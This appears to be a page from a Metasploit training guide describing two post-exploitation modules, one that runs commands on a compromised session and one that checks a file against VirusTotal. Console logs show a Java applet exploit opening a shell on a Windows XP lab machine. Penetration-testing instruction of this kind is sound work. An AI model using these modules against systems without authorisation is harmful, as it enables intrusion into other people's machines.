execute

This module will execute arbitrary commands to an open sessions. Works on Windows, Linux, OSX and Unix platforms.

msf  post(execute) > 
[*] 10.10.0.100      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400

msf  post(execute) > show options

Module options (post/multi/general/execute):

   Name     Current Setting       Required  Description
   ----     ---------------       --------  -----------
   COMMAND  echo hell > file.txt  no        The entire command line to execute on the session
   SESSION  1                     yes       The session to run this module on.

msf  post(execute) > run

[*] Executing echo hell > file.txt on #>Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response: 
[*] Post module execution completed

msf  post(execute) >  sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2CB7-2817

 Directory of C:\Documents and Settings\administrator\Desktop

08/31/2012  09:04 AM    >DIR>          .
08/31/2012  09:04 AM    >DIR>          ..
08/31/2012  09:04 AM                46 file.txt
12/29/2011  03:52 PM                70 portlist.txt
               2 File(s)          1,431 bytes
               2 Dir(s)   4,899,721,216 bytes free

C:\Documents and Settings\administrator\Desktop>

malware_check

This module uploads a file to virustotal.com, and displays the scan results. It can also be run directly from within a meterpreter session. Works on Windows, Linux, OSX and Unix platforms.

msf post(check_malware) > show options

Module options (post/multi/gather/check_malware):

   Name        Current Setting      Required  Description
   ----        ---------------      --------  -----------
   APIKEY                           yes       VirusTotal API key
   REMOTEFILE  C:\msfrev.exe        yes       A file to check from the remote machine
   SESSION     1                    yes       The session to run this module on.
msf post(check_malware) > run

[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55): 

=====================================================================================================================================

 Antivirus             Detected  Version        Result                           Update
 ---------             --------  -------        ------                           ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031      20151125
 AVG                   true      16.0.0.4460    Agent                            20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)        20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031      20151125
 AegisLab              false     1.5                                             20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1              20151124
 AhnLab-V3             true      2015.11.26.00  Trojan/Win32.Shell               20151125
 Alibaba               false     1.0                                             20151125
 Arcabit               true      1.0.0.624      Trojan.Zusy.Elzob.D1F5F          20151125
 Avast                 true      8.0.1489.320   Win32:SwPatch [Wrm]              20151125
 Avira                 true      8.3.2.4        TR/Crypt.EPACK.Gen2              20151125
 Baidu-International   true      3.5.1.41473    Trojan.Win32.Rozena.AM           20151124
 BitDefender           true      7.2            Gen:Variant.Zusy.Elzob.8031      20151125
 Bkav                  false     1.3.0.7383                                      20151125
 ByteHero              false     1.0.0.1                                         20151125
 CAT-QuickHeal         true      14.00          Trojan.Swrort.A                  20151125
 CMC                   false     1.1.0.977                                       20151124
 ClamAV                true      0.98.5.0       Win.Trojan.MSShellcode-7         20151125
 Comodo                true      23654          TrojWare.Win32.Rozena.A          20151125
 Cyren                 true      5.4.16.7       W32/Swrort.A                     20151125
 DrWeb                 true      7.0.16.10090   Trojan.Swrort.1                  20151125
 ESET-NOD32            true      12622          a variant of Win32/Rozena.AM     20151125
 Emsisoft              true      3.5.0.642      Gen:Variant.Zusy.Elzob.8031 (B)  20151125
 F-Prot                true      4.7.1.166      W32/Swrort.A                     20151125
 F-Secure              true      11.0.19100.45  Gen:Variant.Zusy.Elzob.8031      20151125
 Fortinet              true      5.1.220.0      W32/Swrort.C!tr                  20151125
 GData                 true      25             Gen:Variant.Zusy.Elzob.8031      20151125
 Ikarus                true      T3.1.9.5.0     Trojan.Win32.Swrort              20151125
 Jiangmin              false     16.0.100                                        20151124
 K7AntiVirus           true      9.212.17966    Backdoor ( 04c53cce1 )           20151125
 K7GW                  true      9.212.17968    Backdoor ( 04c53cce1 )           20151125
 Kaspersky             true      15.0.1.10      HEUR:Trojan.Win32.Generic        20151125
 Malwarebytes          true      2.1.1.1115     Backdoor.Bot.Gen                 20151125
...snip...

[*] Post module execution completed
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe

[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):

=====================================================================================================================================

 Antivirus             Detected  Version        Result                         Update
 ---------             --------  -------        ------                         ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031    20151125
 AVG                   true      16.0.0.4460    Agent                          20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)      20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031    20151125
 AegisLab              false     1.5                                           20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1            20151124
..snip..
Menu
X Close

 

Certified Pentesting
Professional

OSCP
course starting at
$800 USD

Take Penetration Testing with Kali Linux to gain invaluable penetration testing skills and earn your OSCP.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSCP

Certified Pentesting
Expert

OSCE
course starting at
$1200 USD

Take Cracking the Perimeter to take your penetration testing skills to expert levels and earn your OSCE.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSCE

 

Certified Pentesting
Web Expert

OSWE
course starting at
$1400 USD

Take Advanced Web Attacks and Exploitation, to deep dive into web apps to earn your OSWE.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSWE

Certified Pentesting
Wireless Professional

OSWP
course starting at
$450 USD

Take Offensive Security Wireless Attacks to acquire knowledge about Wi-Fi attacks and earn your OSWP.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSWP

Certified Exploitation
Expert

OSEE
course starting at
See
Live Schedule

Take Advanced Windows Exploitation to develop exploits for Windows systems and earn your OSEE.

  • Live training course
  • Includes certification exam fee
  • Maximum instructor interaction
  • Highly challenging
  • Become an OSEE